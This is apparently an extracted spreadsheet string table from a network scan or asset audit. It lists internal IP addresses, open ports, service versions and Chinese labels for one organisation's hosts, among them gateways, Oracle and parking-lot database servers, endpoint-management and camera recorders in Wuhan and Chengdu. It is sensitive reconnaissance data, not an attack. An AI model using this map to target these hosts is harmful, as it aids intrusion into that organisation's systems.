  </si>
  <si>
    <t>Hikvision-IP CAMERA(Hikvision-NVR)</t>
  </si>
  <si>
    <t>192.168.22.46</t>
  </si>
  <si>
    <t>192.168.22.37</t>
  </si>
  <si>
    <t>192.168.21.222</t>
  </si>
  <si>
    <t>192.168.21.218</t>
  </si>
  <si>
    <t>192.168.21.227</t>
  </si>
  <si>
    <t>192.168.21.225</t>
  </si>
  <si>
    <t>192.168.21.223</t>
  </si>
  <si>
    <t>192.168.21.226</t>
  </si>
  <si>
    <t>192.168.21.221</t>
  </si>
  <si>
    <t>192.168.22.13</t>
  </si>
  <si>
    <t>upnp(49152)
http(80)
rtsp(554)
trivnet1(8200)
hikvision-nvr(8000)</t>
  </si>
  <si>
    <t>Hikvision-NVR(Webserver)(hikvision-camera),Hikvision-IP CAMERA,UPnP/1.0,-Portable-SDK-for-UPnP-devices</t>
  </si>
  <si>
    <t>192.168.15.8</t>
  </si>
  <si>
    <t>192.168.22.40</t>
  </si>
  <si>
    <t>192.168.17.102</t>
  </si>
  <si>
    <t>scp-config(10001)
unknown(58994)
ms-wbt-server(3389)
ssl(5521)</t>
  </si>
  <si>
    <t>192.168.17.3</t>
  </si>
  <si>
    <t>tcpwrapped(5200)
http(80,8080,631,8018)
unknown(9403)
printer(515)
sec-t4net-clt(9401)
sec-t4net-srv(9400)
ssl(443)</t>
  </si>
  <si>
    <t>192.168.17.8</t>
  </si>
  <si>
    <t>tcpwrapped(5200)
unknown(9403)
printer(515)
sec-t4net-clt(9401)
sec-t4net-srv(9400)
http(80,631,8080,8018)
ssl(443)</t>
  </si>
  <si>
    <t>192.168.17.5</t>
  </si>
  <si>
    <t>http(80,8088,631,8018)
ssl(443)
printer(515)
sec-t4net-srv(9400)</t>
  </si>
  <si>
    <t>192.168.17.21</t>
  </si>
  <si>
    <t>ms-wbt-server(3389)
http(5357)
netbios-ssn(139)
msrpc(49665,49667,49684,135,49666,49664,49675,49668,49858)
unknown(5040,10021)
ssl(28000)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.21.22</t>
  </si>
  <si>
    <t>192.168.17.252</t>
  </si>
  <si>
    <t>pando-pub(7680)
ms-wbt-server(3389)
http(5357)
msrpc(49667,49689,49665,49670,135,49676,49664,49666,49668)
unknown(58545,5040,18261,5821)
netbios-ssn(139)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.21.206</t>
  </si>
  <si>
    <t>192.168.17.84</t>
  </si>
  <si>
    <t>pando-pub(7680)
unknown(5040,57076)
http(5357)
netbios-ssn(139)
microsoft-ds(445)
msrpc(49665,49667,49670,135,49666,49664,49702,49668)</t>
  </si>
  <si>
    <t>192.168.17.65</t>
  </si>
  <si>
    <t>isqlplus(5560)
http(5357)
unknown(5040,25713)
netbios-ssn(139)
msrpc(49665,49667,135,49666,49692,49694,49664,1046)
microsoft-ds(445)
tcpwrapped(1236)</t>
  </si>
  <si>
    <t>isqlplus</t>
  </si>
  <si>
    <t>192.168.21.5</t>
  </si>
  <si>
    <t>pando-pub(7680)
unknown(5040)
http(5357)
netbios-ssn(139)
microsoft-ds(445)
msrpc(49665,49667,49673,135,49664,49679,49672)</t>
  </si>
  <si>
    <t>192.168.17.80</t>
  </si>
  <si>
    <t>msrpc(49665,49667,49670,135,49666,49664,49699,49679,49668)
ms-wbt-server(3389)
http(5357)
unknown(64627,5040,56672)
netbios-ssn(139)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>192.168.15.99</t>
  </si>
  <si>
    <t>http(80,8009,8000,65533,8182)
ssh(22)
rtmp(1935)
vcom-tunnel(8001)</t>
  </si>
  <si>
    <t>192.168.17.13</t>
  </si>
  <si>
    <t>http(80)
domain(53)</t>
  </si>
  <si>
    <t>Cloudflare public DNS</t>
  </si>
  <si>
    <t>192.168.13.70</t>
  </si>
  <si>
    <t>tcpwrapped(49692)
unknown(5040)
netbios-ssn(139)
microsoft-ds(445)
msrpc(49667,49665,135,49664,49666,49696,49668)
http(60009,80,60008,60001)</t>
  </si>
  <si>
    <t>Microsoft IIS httpd
Microsoft IIS httpd 10.0</t>
  </si>
  <si>
    <t>ASP.NET-MVC
Bootstrap(Font-Awesome)(jQuery Migrate)(ASP.NET-MVC)</t>
  </si>
  <si>
    <t>192.168.17.56</t>
  </si>
  <si>
    <t>unknown(5040,10056)
pando-pub(7680)
msrpc(49665,49667,49670,49666,49664,49671,49668)</t>
  </si>
  <si>
    <t>192.168.17.198</t>
  </si>
  <si>
    <t>tcpwrapped(443,80)
printer(515)</t>
  </si>
  <si>
    <t>192.168.17.174</t>
  </si>
  <si>
    <t>unknown(5040,10174)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>192.168.21.37</t>
  </si>
  <si>
    <t>192.168.21.217</t>
  </si>
  <si>
    <t>192.168.17.186</t>
  </si>
  <si>
    <t>printer(515)
ms-wbt-server(3389)</t>
  </si>
  <si>
    <t>192.168.13.225</t>
  </si>
  <si>
    <t>192.168.13.80</t>
  </si>
  <si>
    <t>192.168.13.216</t>
  </si>
  <si>
    <t>192.168.13.208</t>
  </si>
  <si>
    <t>192.168.13.175</t>
  </si>
  <si>
    <t>192.168.13.83</t>
  </si>
  <si>
    <t>192.168.13.228</t>
  </si>
  <si>
    <t>192.168.17.155</t>
  </si>
  <si>
    <t>192.168.13.79</t>
  </si>
  <si>
    <t>192.168.13.221</t>
  </si>
  <si>
    <t>192.168.13.182</t>
  </si>
  <si>
    <t>192.168.13.183</t>
  </si>
  <si>
    <t>192.168.13.214</t>
  </si>
  <si>
    <t>192.168.17.96</t>
  </si>
  <si>
    <t>192.168.13.180</t>
  </si>
  <si>
    <t>192.168.13.210</t>
  </si>
  <si>
    <t>192.168.13.201</t>
  </si>
  <si>
    <t>192.168.13.179</t>
  </si>
  <si>
    <t>192.168.13.204</t>
  </si>
  <si>
    <t>192.168.13.74</t>
  </si>
  <si>
    <t>192.168.17.156</t>
  </si>
  <si>
    <t>192.168.17.62</t>
  </si>
  <si>
    <t>192.168.13.226</t>
  </si>
  <si>
    <t>192.168.17.95</t>
  </si>
  <si>
    <t>192.168.13.207</t>
  </si>
  <si>
    <t>192.168.17.197</t>
  </si>
  <si>
    <t>192.168.13.159</t>
  </si>
  <si>
    <t>192.168.13.185</t>
  </si>
  <si>
    <t>192.168.13.172</t>
  </si>
  <si>
    <t>192.168.13.220</t>
  </si>
  <si>
    <t>192.168.13.236</t>
  </si>
  <si>
    <t>192.168.13.223</t>
  </si>
  <si>
    <t>192.168.13.86</t>
  </si>
  <si>
    <t>192.168.13.218</t>
  </si>
  <si>
    <t>192.168.13.177</t>
  </si>
  <si>
    <t>192.168.21.8</t>
  </si>
  <si>
    <t>192.168.13.184</t>
  </si>
  <si>
    <t>192.168.13.178</t>
  </si>
  <si>
    <t>192.168.17.85</t>
  </si>
  <si>
    <t>192.168.13.171</t>
  </si>
  <si>
    <t>192.168.17.206</t>
  </si>
  <si>
    <t>192.168.13.126</t>
  </si>
  <si>
    <t>192.168.13.173</t>
  </si>
  <si>
    <t>192.168.13.181</t>
  </si>
  <si>
    <t>192.168.13.230</t>
  </si>
  <si>
    <t>192.168.13.232</t>
  </si>
  <si>
    <t>192.168.13.239</t>
  </si>
  <si>
    <t>192.168.13.87</t>
  </si>
  <si>
    <t>192.168.13.206</t>
  </si>
  <si>
    <t>192.168.13.213</t>
  </si>
  <si>
    <t>192.168.13.174</t>
  </si>
  <si>
    <t>192.168.17.204</t>
  </si>
  <si>
    <t>192.168.13.187</t>
  </si>
  <si>
    <t>192.168.13.77</t>
  </si>
  <si>
    <t>192.168.13.202</t>
  </si>
  <si>
    <t>192.168.13.85</t>
  </si>
  <si>
    <t>192.168.13.240</t>
  </si>
  <si>
    <t>192.168.13.76</t>
  </si>
  <si>
    <t>192.168.13.219</t>
  </si>
  <si>
    <t>192.168.13.78</t>
  </si>
  <si>
    <t>192.168.13.203</t>
  </si>
  <si>
    <t>192.168.13.215</t>
  </si>
  <si>
    <t>192.168.19.198</t>
  </si>
  <si>
    <t>192.168.19.117</t>
  </si>
  <si>
    <t>192.168.19.224</t>
  </si>
  <si>
    <t>192.168.19.153</t>
  </si>
  <si>
    <t>192.168.19.148</t>
  </si>
  <si>
    <t>192.168.19.191</t>
  </si>
  <si>
    <t>192.168.19.31</t>
  </si>
  <si>
    <t>192.168.19.90</t>
  </si>
  <si>
    <t>192.168.19.107</t>
  </si>
  <si>
    <t>192.168.19.94</t>
  </si>
  <si>
    <t>192.168.19.89</t>
  </si>
  <si>
    <t>192.168.19.69</t>
  </si>
  <si>
    <t>192.168.19.106</t>
  </si>
  <si>
    <t>192.168.19.96</t>
  </si>
  <si>
    <t>192.168.19.174</t>
  </si>
  <si>
    <t>192.168.19.52</t>
  </si>
  <si>
    <t>192.168.19.231</t>
  </si>
  <si>
    <t>192.168.19.196</t>
  </si>
  <si>
    <t>192.168.19.210</t>
  </si>
  <si>
    <t>192.168.19.173</t>
  </si>
  <si>
    <t>192.168.19.163</t>
  </si>
  <si>
    <t>192.168.19.76</t>
  </si>
  <si>
    <t>192.168.19.47</t>
  </si>
  <si>
    <t>192.168.19.19</t>
  </si>
  <si>
    <t>192.168.19.172</t>
  </si>
  <si>
    <t>192.168.19.77</t>
  </si>
  <si>
    <t>192.168.19.194</t>
  </si>
  <si>
    <t>192.168.19.166</t>
  </si>
  <si>
    <t>192.168.19.232</t>
  </si>
  <si>
    <t>192.168.19.225</t>
  </si>
  <si>
    <t>192.168.19.134</t>
  </si>
  <si>
    <t>192.168.19.180</t>
  </si>
  <si>
    <t>192.168.19.71</t>
  </si>
  <si>
    <t>192.168.19.38</t>
  </si>
  <si>
    <t>192.168.19.151</t>
  </si>
  <si>
    <t>192.168.19.126</t>
  </si>
  <si>
    <t>192.168.19.30</t>
  </si>
  <si>
    <t>192.168.19.105</t>
  </si>
  <si>
    <t>192.168.19.114</t>
  </si>
  <si>
    <t>192.168.19.109</t>
  </si>
  <si>
    <t>192.168.19.84</t>
  </si>
  <si>
    <t>192.168.19.82</t>
  </si>
  <si>
    <t>192.168.19.70</t>
  </si>
  <si>
    <t>192.168.19.197</t>
  </si>
  <si>
    <t>192.168.19.50</t>
  </si>
  <si>
    <t>192.168.19.80</t>
  </si>
  <si>
    <t>192.168.19.48</t>
  </si>
  <si>
    <t>192.168.19.220</t>
  </si>
  <si>
    <t>192.168.19.207</t>
  </si>
  <si>
    <t>192.168.19.152</t>
  </si>
  <si>
    <t>192.168.19.157</t>
  </si>
  <si>
    <t>192.168.19.41</t>
  </si>
  <si>
    <t>192.168.19.147</t>
  </si>
  <si>
    <t>192.168.19.53</t>
  </si>
  <si>
    <t>192.168.19.228</t>
  </si>
  <si>
    <t>192.168.19.74</t>
  </si>
  <si>
    <t>192.168.19.73</t>
  </si>
  <si>
    <t>192.168.19.32</t>
  </si>
  <si>
    <t>192.168.19.85</t>
  </si>
  <si>
    <t>192.168.19.250</t>
  </si>
  <si>
    <t>192.168.19.136</t>
  </si>
  <si>
    <t>192.168.19.145</t>
  </si>
  <si>
    <t>dhanalakshmi(34567)
soap(8899)
tcpwrapped(80)
unknown(9527,9530,34561)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.19.140</t>
  </si>
  <si>
    <t>192.168.19.113</t>
  </si>
  <si>
    <t>192.168.19.182</t>
  </si>
  <si>
    <t>192.168.19.188</t>
  </si>
  <si>
    <t>192.168.19.43</t>
  </si>
  <si>
    <t>192.168.19.170</t>
  </si>
  <si>
    <t>192.168.19.111</t>
  </si>
  <si>
    <t>192.168.19.137</t>
  </si>
  <si>
    <t>192.168.19.181</t>
  </si>
  <si>
    <t>192.168.19.186</t>
  </si>
  <si>
    <t>192.168.19.177</t>
  </si>
  <si>
    <t>192.168.19.37</t>
  </si>
  <si>
    <t>192.168.19.187</t>
  </si>
  <si>
    <t>192.168.19.35</t>
  </si>
  <si>
    <t>192.168.19.91</t>
  </si>
  <si>
    <t>192.168.19.150</t>
  </si>
  <si>
    <t>192.168.19.185</t>
  </si>
  <si>
    <t>192.168.19.208</t>
  </si>
  <si>
    <t>192.168.19.221</t>
  </si>
  <si>
    <t>192.168.19.49</t>
  </si>
  <si>
    <t>192.168.19.87</t>
  </si>
  <si>
    <t>192.168.19.251</t>
  </si>
  <si>
    <t>192.168.19.44</t>
  </si>
  <si>
    <t>192.168.19.108</t>
  </si>
  <si>
    <t>192.168.19.46</t>
  </si>
  <si>
    <t>192.168.19.176</t>
  </si>
  <si>
    <t>192.168.19.125</t>
  </si>
  <si>
    <t>192.168.19.57</t>
  </si>
  <si>
    <t>192.168.19.165</t>
  </si>
  <si>
    <t>192.168.19.81</t>
  </si>
  <si>
    <t>192.168.19.115</t>
  </si>
  <si>
    <t>192.168.19.169</t>
  </si>
  <si>
    <t>192.168.19.171</t>
  </si>
  <si>
    <t>192.168.19.209</t>
  </si>
  <si>
    <t>192.168.19.124</t>
  </si>
  <si>
    <t>192.168.19.142</t>
  </si>
  <si>
    <t>192.168.19.112</t>
  </si>
  <si>
    <t>192.168.19.20</t>
  </si>
  <si>
    <t>192.168.19.149</t>
  </si>
  <si>
    <t>soap(8899)
landesk-rc(9527)
rtsp(554)
dhanalakshmi(34567)
http(80)
unknown(9530,34561)</t>
  </si>
  <si>
    <t>192.168.19.129</t>
  </si>
  <si>
    <t>192.168.19.29</t>
  </si>
  <si>
    <t>192.168.19.131</t>
  </si>
  <si>
    <t>192.168.19.189</t>
  </si>
  <si>
    <t>192.168.19.21</t>
  </si>
  <si>
    <t>192.168.19.226</t>
  </si>
  <si>
    <t>192.168.19.93</t>
  </si>
  <si>
    <t>192.168.19.128</t>
  </si>
  <si>
    <t>192.168.19.40</t>
  </si>
  <si>
    <t>192.168.19.167</t>
  </si>
  <si>
    <t>192.168.19.83</t>
  </si>
  <si>
    <t>192.168.19.78</t>
  </si>
  <si>
    <t>192.168.19.141</t>
  </si>
  <si>
    <t>192.168.19.164</t>
  </si>
  <si>
    <t>192.168.19.42</t>
  </si>
  <si>
    <t>192.168.19.138</t>
  </si>
  <si>
    <t>192.168.19.230</t>
  </si>
  <si>
    <t>192.168.19.195</t>
  </si>
  <si>
    <t>192.168.19.72</t>
  </si>
  <si>
    <t>192.168.19.10</t>
  </si>
  <si>
    <t>192.168.19.12</t>
  </si>
  <si>
    <t>192.168.19.11</t>
  </si>
  <si>
    <t>192.168.19.7</t>
  </si>
  <si>
    <t>192.168.19.6</t>
  </si>
  <si>
    <t>192.168.19.9</t>
  </si>
  <si>
    <t>192.168.19.241</t>
  </si>
  <si>
    <t>sdr(9010)
rtsp(554)
http(80)
tcpwrapped(8443)
hikvision-nvr(8000)
tambora(9020)</t>
  </si>
  <si>
    <t>192.168.19.14</t>
  </si>
  <si>
    <t>192.168.19.143</t>
  </si>
  <si>
    <t>192.168.19.254</t>
  </si>
  <si>
    <t>192.168.5.21</t>
  </si>
  <si>
    <t>http(80)
remoteanything(4000)</t>
  </si>
  <si>
    <t>192.168.5.32</t>
  </si>
  <si>
    <t>zabbix代理服务器-武汉</t>
  </si>
  <si>
    <t>192.168.4.213</t>
  </si>
  <si>
    <t>3906908339</t>
  </si>
  <si>
    <t>ssh(22)
mysql(3306)
rpcbind(111)
ssl(10051)
mysqlx(33060)
x11(6000)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>192.168.4.220</t>
  </si>
  <si>
    <t>OpenResty,squid</t>
  </si>
  <si>
    <t>192.168.19.86</t>
  </si>
  <si>
    <t>192.168.19.119</t>
  </si>
  <si>
    <t>192.168.19.121</t>
  </si>
  <si>
    <t>武汉漏扫工具云镜</t>
  </si>
  <si>
    <t>192.168.4.215</t>
  </si>
  <si>
    <t>ssl(443,444)
java-rmi(1099)
http(8082)
mysqlx(33060)</t>
  </si>
  <si>
    <t>mysqlx</t>
  </si>
  <si>
    <t>YUNJING</t>
  </si>
  <si>
    <t>武汉网关</t>
  </si>
  <si>
    <t>192.168.4.1</t>
  </si>
  <si>
    <t>192.168.19.22</t>
  </si>
  <si>
    <t>192.168.19.211</t>
  </si>
  <si>
    <t>武汉奇安信天擎终端管理</t>
  </si>
  <si>
    <t>192.168.4.210</t>
  </si>
  <si>
    <t>vnc(5901)
https(28443)
ms-wbt-server(3389)
tcpwrapped(36781,6785)
netbios-ssn(139)
microsoft-ds(445)
hotline(5500)
ssl(443)
http(80,19346,47001,19345,5985,17000)
msrpc(1540,1536,1539,135,1559,1541,1537,1543)</t>
  </si>
  <si>
    <t>nginx
Microsoft-HTTPAPI 2.0</t>
  </si>
  <si>
    <t>192.168.19.249</t>
  </si>
  <si>
    <t>192.168.19.236</t>
  </si>
  <si>
    <t>192.168.19.248</t>
  </si>
  <si>
    <t>192.168.19.235</t>
  </si>
  <si>
    <t>192.168.19.240</t>
  </si>
  <si>
    <t>192.168.19.200</t>
  </si>
  <si>
    <t>192.168.19.27</t>
  </si>
  <si>
    <t>192.168.19.178</t>
  </si>
  <si>
    <t>192.168.19.25</t>
  </si>
  <si>
    <t>192.168.19.101</t>
  </si>
  <si>
    <t>192.168.19.233</t>
  </si>
  <si>
    <t>192.168.19.99</t>
  </si>
  <si>
    <t>192.168.19.63</t>
  </si>
  <si>
    <t>192.168.19.199</t>
  </si>
  <si>
    <t>192.168.19.28</t>
  </si>
  <si>
    <t>192.168.19.179</t>
  </si>
  <si>
    <t>192.168.19.237</t>
  </si>
  <si>
    <t>192.168.19.218</t>
  </si>
  <si>
    <t>192.168.19.234</t>
  </si>
  <si>
    <t>192.168.19.66</t>
  </si>
  <si>
    <t>192.168.19.216</t>
  </si>
  <si>
    <t>192.168.19.59</t>
  </si>
  <si>
    <t>192.168.19.239</t>
  </si>
  <si>
    <t>192.168.19.67</t>
  </si>
  <si>
    <t>192.168.19.100</t>
  </si>
  <si>
    <t>192.168.19.201</t>
  </si>
  <si>
    <t>192.168.19.242</t>
  </si>
  <si>
    <t>192.168.19.243</t>
  </si>
  <si>
    <t>192.168.19.244</t>
  </si>
  <si>
    <t>192.168.19.246</t>
  </si>
  <si>
    <t>192.168.19.98</t>
  </si>
  <si>
    <t>192.168.19.97</t>
  </si>
  <si>
    <t>武汉富士停车场数据库服务器</t>
  </si>
  <si>
    <t>192.168.4.211</t>
  </si>
  <si>
    <t>4109747514</t>
  </si>
  <si>
    <t>数据库服务器备</t>
  </si>
  <si>
    <t>192.168.4.206</t>
  </si>
  <si>
    <t>2137077649</t>
  </si>
  <si>
    <t>status(9118)
rpcbind(111)
zabbix-agent(10050)
oracle-tns(34724,1521)
ssh(22)</t>
  </si>
  <si>
    <t>数据库服务器主</t>
  </si>
  <si>
    <t>192.168.4.205</t>
  </si>
  <si>
    <t>192.168.4.202</t>
  </si>
  <si>
    <t>4178055477</t>
  </si>
  <si>
    <t>oracle-tns(1521,26316)
ssh(22)
tcpwrapped(10050)</t>
  </si>
  <si>
    <t>192.168.19.2</t>
  </si>
  <si>
    <t>192.168.19.58</t>
  </si>
  <si>
    <t>应用服务器备</t>
  </si>
  <si>
    <t>192.168.4.204</t>
  </si>
  <si>
    <t>4102951349</t>
  </si>
  <si>
    <t>27.17.5.74</t>
  </si>
  <si>
    <t>武汉金贵应用服务器</t>
  </si>
  <si>
    <t>192.168.4.217</t>
  </si>
  <si>
    <t>1344724758</t>
  </si>
  <si>
    <t>武汉旧票务服务器</t>
  </si>
  <si>
    <t>192.168.4.200</t>
  </si>
  <si>
    <t>2666230121</t>
  </si>
  <si>
    <t>停车场服务器-备</t>
  </si>
  <si>
    <t>192.168.4.208</t>
  </si>
  <si>
    <t>3308659288</t>
  </si>
  <si>
    <t>停车场服务器-主</t>
  </si>
  <si>
    <t>192.168.4.207</t>
  </si>
  <si>
    <t>1994013655</t>
  </si>
  <si>
    <t>武汉数据库还原测试</t>
  </si>
  <si>
    <t>192.168.4.209</t>
  </si>
  <si>
    <t>3390264151</t>
  </si>
  <si>
    <t>武汉金贵应数据库服务器</t>
  </si>
  <si>
    <t>192.168.4.218</t>
  </si>
  <si>
    <t>2975827064</t>
  </si>
  <si>
    <t>应用服务器主</t>
  </si>
  <si>
    <t>192.168.4.203</t>
  </si>
  <si>
    <t>1572019774</t>
  </si>
  <si>
    <t>220.249.115.2</t>
  </si>
  <si>
    <t>192.168.23.98</t>
  </si>
  <si>
    <t>192.168.24.220</t>
  </si>
  <si>
    <t>192.168.23.95</t>
  </si>
  <si>
    <t>192.168.24.208</t>
  </si>
  <si>
    <t>192.168.24.187</t>
  </si>
  <si>
    <t>192.168.24.215</t>
  </si>
  <si>
    <t>192.168.25.200</t>
  </si>
  <si>
    <t>http(80)
unknown(37777)
radan-http(8088)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.23.117</t>
  </si>
  <si>
    <t>192.168.23.64</t>
  </si>
  <si>
    <t>192.168.23.35</t>
  </si>
  <si>
    <t>192.168.24.158</t>
  </si>
  <si>
    <t>192.168.24.6</t>
  </si>
  <si>
    <t>radan-http(8088)
unknown(37777)
tcpwrapped(8686)
http(80)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.23.92</t>
  </si>
  <si>
    <t>192.168.23.72</t>
  </si>
  <si>
    <t>192.168.24.192</t>
  </si>
  <si>
    <t>192.168.23.15</t>
  </si>
  <si>
    <t>192.168.25.20</t>
  </si>
  <si>
    <t>192.168.23.223</t>
  </si>
  <si>
    <t>192.168.23.52</t>
  </si>
  <si>
    <t>192.168.23.58</t>
  </si>
  <si>
    <t>192.168.23.125</t>
  </si>
  <si>
    <t>192.168.24.194</t>
  </si>
  <si>
    <t>192.168.24.213</t>
  </si>
  <si>
    <t>192.168.23.106</t>
  </si>
  <si>
    <t>192.168.23.102</t>
  </si>
  <si>
    <t>192.168.24.197</t>
  </si>
  <si>
    <t>192.168.23.40</t>
  </si>
  <si>
    <t>192.168.23.18</t>
  </si>
  <si>
    <t>192.168.23.29</t>
  </si>
  <si>
    <t>192.168.25.202</t>
  </si>
  <si>
    <t>192.168.23.57</t>
  </si>
  <si>
    <t>192.168.23.36</t>
  </si>
  <si>
    <t>192.168.24.135</t>
  </si>
  <si>
    <t>192.168.24.214</t>
  </si>
  <si>
    <t>192.168.24.191</t>
  </si>
  <si>
    <t>192.168.24.154</t>
  </si>
  <si>
    <t>192.168.23.32</t>
  </si>
  <si>
    <t>192.168.23.50</t>
  </si>
  <si>
    <t>192.168.23.47</t>
  </si>
  <si>
    <t>192.168.23.113</t>
  </si>
  <si>
    <t>192.168.23.105</t>
  </si>
  <si>
    <t>192.168.23.150</t>
  </si>
  <si>
    <t>192.168.25.12</t>
  </si>
  <si>
    <t>192.168.23.66</t>
  </si>
  <si>
    <t>192.168.24.190</t>
  </si>
  <si>
    <t>192.168.23.103</t>
  </si>
  <si>
    <t>192.168.24.141</t>
  </si>
  <si>
    <t>192.168.23.96</t>
  </si>
  <si>
    <t>192.168.23.51</t>
  </si>
  <si>
    <t>192.168.25.201</t>
  </si>
  <si>
    <t>192.168.24.216</t>
  </si>
  <si>
    <t>192.168.23.45</t>
  </si>
  <si>
    <t>192.168.23.118</t>
  </si>
  <si>
    <t>192.168.23.107</t>
  </si>
  <si>
    <t>192.168.24.239</t>
  </si>
  <si>
    <t>soap(81)
rtsp(554)
http(80)
mit-ml-dev(85)
upnp(49152)
sip(5060)</t>
  </si>
  <si>
    <t>192.168.23.68</t>
  </si>
  <si>
    <t>192.168.25.203</t>
  </si>
  <si>
    <t>192.168.23.78</t>
  </si>
  <si>
    <t>192.168.23.123</t>
  </si>
  <si>
    <t>192.168.23.104</t>
  </si>
  <si>
    <t>192.168.23.89</t>
  </si>
  <si>
    <t>192.168.23.33</t>
  </si>
  <si>
    <t>192.168.23.22</t>
  </si>
  <si>
    <t>192.168.23.120</t>
  </si>
  <si>
    <t>192.168.23.87</t>
  </si>
  <si>
    <t>192.168.25.150</t>
  </si>
  <si>
    <t>192.168.23.61</t>
  </si>
  <si>
    <t>192.168.23.73</t>
  </si>
  <si>
    <t>192.168.24.210</t>
  </si>
  <si>
    <t>192.168.23.30</t>
  </si>
  <si>
    <t>192.168.24.212</t>
  </si>
  <si>
    <t>192.168.23.88</t>
  </si>
  <si>
    <t>192.168.25.22</t>
  </si>
  <si>
    <t>192.168.25.11</t>
  </si>
  <si>
    <t>192.168.23.41</t>
  </si>
  <si>
    <t>192.168.25.151</t>
  </si>
  <si>
    <t>192.168.25.21</t>
  </si>
  <si>
    <t>192.168.23.119</t>
  </si>
  <si>
    <t>192.168.23.90</t>
  </si>
  <si>
    <t>192.168.24.196</t>
  </si>
  <si>
    <t>192.168.23.71</t>
  </si>
  <si>
    <t>192.168.23.70</t>
  </si>
  <si>
    <t>192.168.23.53</t>
  </si>
  <si>
    <t>192.168.23.49</t>
  </si>
  <si>
    <t>192.168.23.23</t>
  </si>
  <si>
    <t>192.168.23.112</t>
  </si>
  <si>
    <t>192.168.23.101</t>
  </si>
  <si>
    <t>192.168.23.20</t>
  </si>
  <si>
    <t>192.168.24.186</t>
  </si>
  <si>
    <t>192.168.23.91</t>
  </si>
  <si>
    <t>192.168.23.111</t>
  </si>
  <si>
    <t>192.168.23.67</t>
  </si>
  <si>
    <t>192.168.23.27</t>
  </si>
  <si>
    <t>192.168.23.48</t>
  </si>
  <si>
    <t>192.168.23.99</t>
  </si>
  <si>
    <t>192.168.23.84</t>
  </si>
  <si>
    <t>192.168.23.65</t>
  </si>
  <si>
    <t>192.168.23.43</t>
  </si>
  <si>
    <t>192.168.23.100</t>
  </si>
  <si>
    <t>192.168.23.21</t>
  </si>
  <si>
    <t>192.168.23.16</t>
  </si>
  <si>
    <t>192.168.23.75</t>
  </si>
  <si>
    <t>192.168.23.37</t>
  </si>
  <si>
    <t>192.168.24.193</t>
  </si>
  <si>
    <t>192.168.23.86</t>
  </si>
  <si>
    <t>192.168.23.60</t>
  </si>
  <si>
    <t>192.168.23.17</t>
  </si>
  <si>
    <t>192.168.24.100</t>
  </si>
  <si>
    <t>192.168.23.121</t>
  </si>
  <si>
    <t>192.168.23.126</t>
  </si>
  <si>
    <t>192.168.23.11</t>
  </si>
  <si>
    <t>unknown(37777)
avt-profile-2(5005)
rtsp(554)
http(80)
radan-http(8088)
upnp(5000)
tcpwrapped(8686)</t>
  </si>
  <si>
    <t>192.168.23.127</t>
  </si>
  <si>
    <t>192.168.23.133</t>
  </si>
  <si>
    <t>http(80)
unknown(37777)
rtmp(1935)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.25.155</t>
  </si>
  <si>
    <t>192.168.24.4</t>
  </si>
  <si>
    <t>192.168.22.75</t>
  </si>
  <si>
    <t>192.168.22.70</t>
  </si>
  <si>
    <t>192.168.22.73</t>
  </si>
  <si>
    <t>192.168.22.69</t>
  </si>
  <si>
    <t>192.168.22.71</t>
  </si>
  <si>
    <t>192.168.22.66</t>
  </si>
  <si>
    <t>192.168.22.78</t>
  </si>
  <si>
    <t>192.168.24.1</t>
  </si>
  <si>
    <t>192.168.22.84</t>
  </si>
  <si>
    <t>192.168.22.76</t>
  </si>
  <si>
    <t>192.168.23.231</t>
  </si>
  <si>
    <t>192.168.23.1</t>
  </si>
  <si>
    <t>192.168.25.1</t>
  </si>
  <si>
    <t>192.168.23.134</t>
  </si>
  <si>
    <t>192.168.24.22</t>
  </si>
  <si>
    <t>192.168.23.19</t>
  </si>
  <si>
    <t>192.168.25.210</t>
  </si>
  <si>
    <t>http(80)
hikvision-nvr(8000)
tcpwrapped(30960)
rtsp(554)</t>
  </si>
  <si>
    <t>192.168.23.224</t>
  </si>
  <si>
    <t>192.168.24.249</t>
  </si>
  <si>
    <t>成都H3C机房监控系统</t>
  </si>
  <si>
    <t>172.20.34.121</t>
  </si>
  <si>
    <t>ftp(21)
mysql(3306)
ssh(22)
http(80,8081,8082,9991)
rtmp(1935)
llmnr(5355)
telnet(23)</t>
  </si>
  <si>
    <t>Highcharts(layer.js)(Font-Awesome)(Angular)(D3)(jQuery)(Bootstrap)</t>
  </si>
  <si>
    <t>172.20.35.88</t>
  </si>
  <si>
    <t>http(8161,6730,5357,80)
tcpwrapped(58710)
ftp(21)
unknown(5040)
ssl(5672,61616,1883,61613,443)
rtsp(14988)
java-rmi(1099)</t>
  </si>
  <si>
    <t>Jetty 9.4.39.v20210325
nginx
Microsoft-HTTPAPI 2.0</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI,Jetty</t>
  </si>
  <si>
    <t>172.20.34.105</t>
  </si>
  <si>
    <t>ncacn_http(593,3388)
ms-wbt-server(3389)
msrpc(49881,49705,49706,49665,49673,49666,135,5504,49664,49670,49703,64339)
tcpwrapped(49667,15887)
netbios-ssn(139)
http(80,5985,47001)
microsoft-ds(445)
ssl(443)
raxa-mgmt(6099)</t>
  </si>
  <si>
    <t>成都超融合物理服务器地址</t>
  </si>
  <si>
    <t>172.20.34.71</t>
  </si>
  <si>
    <t>http(80)
ssh(22)
iscsi(3260)
ssl(22001,22011,443,22041,4480,22012,23031,23020,22010)</t>
  </si>
  <si>
    <t>成都深信服云镜</t>
  </si>
  <si>
    <t>172.20.34.100</t>
  </si>
  <si>
    <t>unknown(7109,38227)
msrpc(49155,49153,135,49156,49257,49154,49152,49253)
netbios-ssn(139)
postgresql(5432)
http(33580,5985,38230,47001,8081,12300,7001,7006)
microsoft-ds(445)</t>
  </si>
  <si>
    <t>postgreSQL 9.1.12 - 9.1.14</t>
  </si>
  <si>
    <t>Microsoft-HTTPAPI 2.0
nweb(Kerio-WebSTAR)
Apache-Tomcat
HTTPServer</t>
  </si>
  <si>
    <t>172.20.34.130</t>
  </si>
  <si>
    <t>http(19123,19000,9090,19124,80,12123,34568,8000)
mysql(3306)
ssh(22)
ssl(31884,443)
llmnr(5355)
unknown(31885)</t>
  </si>
  <si>
    <t>nginx
Minio</t>
  </si>
